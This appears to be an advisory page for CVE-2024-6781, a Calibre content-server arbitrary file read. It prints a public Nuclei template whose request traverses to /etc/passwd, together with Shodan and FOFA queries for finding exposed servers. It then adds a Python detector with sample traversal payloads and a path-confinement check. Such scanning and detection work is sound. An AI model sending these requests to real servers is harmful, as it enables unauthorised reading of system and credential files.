CVE-2024-6781: Calibre <= 7.14.0 Arbitrary File Read

Date: 2025-08-01 | Affected software: Calibre | PoC: public

Vulnerability description

Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.

PoC code [public]

id: CVE-2024-6781

info:
  name: Calibre <= 7.14.0 Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  classification:
    epss-score: 0.93406
    epss-percentile: 0.99814
    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: calibre-ebook
    product: calibre
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    max-request: 2
  tags: cve,cve2024,calibre,lfi

http:
  - raw:
      - |
        GET /interface-data/books-init HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: book_ids
        internal: true
        json:
          - '.search_result.book_ids[0]'

  - raw:
      - |
        POST /cdb/cmd/export HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]

    matchers-condition: and
    matchers:
      - type: word
        part: content_type
        words:
          - "application/json"

      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
          - '"result":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402207456ae451ab5957181a36175d5f73c4bae8c4c762c0f5a75e7da821d6a98f16f02204a76a6b97dd55839b38a2ae77d91727c858de833a008e294b914c2749e832475:922c64590222798bb761d5b6d8e72950

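A defender-side check for this bug, added here and not part of the advisory or of calibre's own code: it flags `extra_file` export requests to the content server whose path resolves outside the per-book directory (the traversal the template above relies on), and `is_confined` is the path-confinement test a hardened server would apply before serving such a file. The log line format, `SAMPLE_REQUESTS` and the book directory are constructed for the example.

```python
import json
import os
import re
from typing import List, Optional

# Constructed sample requests (not from the advisory) in a simple
# "METHOD PATH BODY" shape, as a reverse proxy or WAF might record them.
SAMPLE_REQUESTS = [
    'POST /cdb/cmd/export ["extra_file", 12, "../../../../../etc/passwd", ""]',
    'POST /cdb/cmd/export ["extra_file", 12, "notes/readme.txt", ""]',
    'POST /cdb/cmd/export ["extra_file", 12, "/etc/shadow", ""]',
    'GET /interface-data/books-init ',
]

EXPORT_PATH = "/cdb/cmd/export"


def is_confined(base_dir: str, requested: str) -> bool:
    """True only if `requested`, resolved against base_dir, stays inside it.
    Hypothetical hardening check; realpath also collapses '..' segments."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, target]) == base


def classify_request(line: str,
                     book_dir: str = "/srv/calibre/library/book_12") -> Optional[str]:
    """Return a finding for an extra_file export that escapes book_dir, else None."""
    m = re.match(r"^(\w+) (\S+) ?(.*)$", line)
    if not m:
        return None
    method, path, body = m.groups()
    if method != "POST" or path != EXPORT_PATH or not body:
        return None
    try:
        args = json.loads(body)  # body is the JSON argument list of the cdb command
    except json.JSONDecodeError:
        return None
    if not (isinstance(args, list) and len(args) >= 3 and args[0] == "extra_file"):
        return None
    requested = str(args[2])
    # An absolute path or one that resolves outside the book directory is the
    # arbitrary-file-read pattern; both are rejected by the confinement check.
    if os.path.isabs(requested) or not is_confined(book_dir, requested):
        return f"path escape in extra_file export: {requested!r}"
    return None


def scan(lines: List[str]) -> List[str]:
    """Run classify_request over log lines and collect the findings."""
    return [f for f in (classify_request(l) for l in lines) if f]
```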